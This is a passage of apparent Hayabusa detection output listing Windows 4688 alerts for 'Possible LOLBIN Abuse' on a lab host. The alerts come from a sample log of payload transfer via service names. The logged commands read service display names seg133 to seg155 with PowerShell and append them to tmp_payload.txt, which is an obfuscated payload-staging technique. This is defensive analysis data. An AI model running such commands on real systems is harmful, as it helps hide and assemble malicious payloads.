C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:40.633 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:40.633 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:42.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:42.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:43.595 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:43.610 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:45.043 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:45.043 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:46.509 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:46.509 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:48.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:48.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:49.478 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:49.493 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:50.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:50.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:52.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:52.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:53.856 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:53.872 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:55.310 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:55.310 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:56.748 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:56.764 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:58.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xec8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:58.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:59.670 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:59.686 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:01.122 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:01.137 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:02.574 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:02.574 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:04.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:04.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:05.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:05.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:06.935 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:06.935 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:08.391 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:08.391 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:09.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:09.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:11.334 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x218 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:11.334 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:12.782 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:12.782 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file 